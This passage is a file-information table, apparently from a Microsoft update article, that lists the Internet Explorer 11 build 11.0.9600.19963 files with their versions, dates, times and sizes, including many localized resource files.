11.0.9600.19963| 12-Feb-2021| 19:29| 4,096 \nielowutil.exe| 11.0.9600.19963| 12-Feb-2021| 19:06| 222,720 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:48| 870,400 \nIEShims.dll| 11.0.9600.19963| 12-Feb-2021| 17:57| 387,072 \nWindows Pop-up Blocked.wav| Not versioned| 25-Jun-2019| 6:16| 85,548 \nWindows Information Bar.wav| Not versioned| 25-Jun-2019| 6:16| 23,308 \nWindows Feed Discovered.wav| Not versioned| 25-Jun-2019| 6:16| 19,884 \nWindows Navigation Start.wav| Not versioned| 25-Jun-2019| 6:16| 11,340 \nbing.ico| Not versioned| 25-Jun-2019| 6:14| 5,430 \nieUnatt.exe| 11.0.9600.19963| 12-Feb-2021| 19:04| 144,384 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 13-Feb-2021| 13:47| 2,956 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 628,736 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 1,862,656 \nMshtmlDac.dll| 11.0.9600.19963| 12-Feb-2021| 19:14| 88,064 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 18:38| 1,217,024 \noccache.dll| 11.0.9600.19963| 12-Feb-2021| 18:39| 152,064 \ndesktop.ini| Not versioned| 25-Jun-2019| 6:12| 65 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:30| 262,144 \ndesktop.ini| Not versioned| 25-Jun-2019| 6:12| 65 \nmsrating.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 199,680 \nicrav03.rat| Not versioned| 25-Jun-2019| 6:12| 8,798 \nticrf.rat| Not versioned| 25-Jun-2019| 6:12| 1,988 \niertutil.dll| 11.0.9600.19963| 12-Feb-2021| 19:17| 2,915,840 \nsqmapi.dll| 6.2.9200.16384| 13-Feb-2021| 12:44| 286,088 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:28| 728,064 \niernonce.dll| 11.0.9600.19963| 12-Feb-2021| 19:07| 34,304 \niesetup.dll| 11.0.9600.19963| 12-Feb-2021| 19:16| 66,560 \nieuinit.inf| Not versioned| 12-Feb-2021| 17:31| 16,303 \ninseng.dll| 11.0.9600.19963| 12-Feb-2021| 18:46| 107,520 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:45| 219,648 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:07| 172,032 \nTimeline.cpu.xml| Not versioned| 25-Jun-2019| 6:12| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 1,018,880 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 2,066,432 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 2,121,216 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 2,075,136 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 2,063,872 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 2,314,240 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 2,390,528 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 2,033,152 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 2,307,584 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 2,255,872 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 2,061,312 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 2,326,016 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 2,019,840 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 2,071,040 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 2,082,816 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 2,307,584 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 2,170,368 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 2,153,984 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 2,291,712 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 2,283,520 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 2,052,096 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 2,301,952 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 2,093,056 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 2,075,648 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 2,299,392 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 2,094,592 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 2,316,800 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 2,305,536 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 2,278,912 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 2,277,888 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 2,060,288 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 2,315,776 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 2,278,912 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 2,324,992 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 2,098,176 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 1,890,304 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 1,890,304 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 3,072 \nieframe.dll| 11.0.9600.19963| 12-Feb-2021| 18:26| 15,506,944 \nieui.dll| 11.0.9600.19963| 12-Feb-2021| 19:05| 615,936 \nieframe.ptxml| Not versioned| 12-Feb-2021| 16:23| 24,486 \nieinstal.exe| 11.0.9600.19963| 12-Feb-2021| 18:40| 492,032 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:46| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:47| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:48| 526,294 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:49| 499,654 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:50| 552,337 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:50| 944,559 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:48| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:51| 543,946 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:52| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:53| 526,557 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:54| 575,838 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:54| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:55| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:56| 570,737 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:57| 548,119 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:58| 639,271 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:59| 525,504 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:59| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:00| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:01| 488,488 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:02| 548,494 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:03| 559,343 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:03| 535,067 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:04| 541,455 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:05| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:06| 804,470 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:07| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:07| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:08| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:09| 503,909 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:10| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:10| 521,583 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:11| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:13| 420,082 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:13| 436,651 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:14| 436,651 \ninetres.admx| Not versioned| 8-Feb-2021| 20:02| 1,678,023 \nMsSpellCheckingFacility.exe| 6.3.9600.19963| 12-Feb-2021| 18:56| 970,752 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 29,184 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 35,328 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 37,888 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 27,648 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 33,792 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 23,040 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 22,016 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 31,232 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 35,840 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 34,816 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 32,256 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 30,720 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 16,384 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 16,896 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 16,896 \njscript9.dll| 11.0.9600.19963| 12-Feb-2021| 19:04| 5,499,904 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 19:03| 814,592 \njscript.dll| 5.8.9600.19963| 12-Feb-2021| 19:04| 785,408 \nvbscript.dll| 5.8.9600.19963| 12-Feb-2021| 19:15| 581,120 \niexplore.exe| 11.0.9600.19963| 13-Feb-2021| 11:46| 810,376 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nmsfeeds.dll| 11.0.9600.19963| 12-Feb-2021| 18:12| 696,320 \nmsfeeds.mof| Not versioned| 12-Feb-2021| 16:34| 1,518 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtmlmedia.dll| 11.0.9600.19963| 12-Feb-2021| 18:11| 1,155,584 \nmshtml.dll| 11.0.9600.19963| 12-Feb-2021| 18:58| 20,296,192 \nmshtml.tlb| 11.0.9600.19963| 12-Feb-2021| 18:59| 2,724,864 \nwow64_Microsoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 12-Feb-2021| 16:26| 3,228 \nieetwproxystub.dll| 11.0.9600.19963| 12-Feb-2021| 18:46| 47,616 \nieUnatt.exe| 11.0.9600.19963| 12-Feb-2021| 18:37| 115,712 \noccache.dll| 11.0.9600.19963| 12-Feb-2021| 18:18| 130,048 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \niernonce.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 30,720 \niesetup.dll| 11.0.9600.19963| 12-Feb-2021| 18:47| 62,464 \nieuinit.inf| Not versioned| 12-Feb-2021| 17:30| 16,303 \nieframe.dll| 11.0.9600.19963| 12-Feb-2021| 18:09| 13,881,856 \nieui.dll| 11.0.9600.19963| 12-Feb-2021| 18:38| 476,160 \nie9props.propdesc| Not versioned| 23-Sep-2018| 6:32| 2,843 \nwow64_ieframe.ptxml| Not versioned| 12-Feb-2021| 16:26| 24,486 \njscript9.dll| 11.0.9600.19963| 12-Feb-2021| 18:14| 4,112,384 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:37| 653,824 \nvbscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:47| 498,176 \nurlmon.dll| 11.0.9600.19963| 12-Feb-2021| 17:50| 1,343,488 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 31,744 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 36,352 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 35,328 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 36,864 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 39,424 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 32,768 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 37,376 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 33,280 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 38,400 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 30,720 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 35,328 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 36,864 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 25,600 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 24,576 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 36,352 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 33,280 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 20,992 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 21,504 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 21,504 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 46,592 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 56,320 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 57,856 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 49,664 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 54,272 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 47,616 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 49,152 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 55,296 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 45,056 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 51,712 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 51,712 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 53,248 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 39,424 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 35,840 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 50,176 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 50,688 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 53,760 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 54,272 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 54,272 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 53,248 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 51,712 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 50,688 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 50,688 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 50,176 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 50,176 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 30,720 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 30,720 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 30,720 \ninetcpl.cpl| 11.0.9600.19963| 12-Feb-2021| 18:12| 2,058,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 10,752 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 307,200 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 293,888 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 290,304 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 299,008 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 303,104 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 282,112 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 296,960 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 283,648 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 291,840 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 299,520 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 275,968 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 290,816 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 293,376 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 296,960 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 258,048 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 256,512 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 289,280 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 288,256 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 285,184 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 295,424 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 297,472 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 292,864 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 295,424 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 294,400 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 294,400 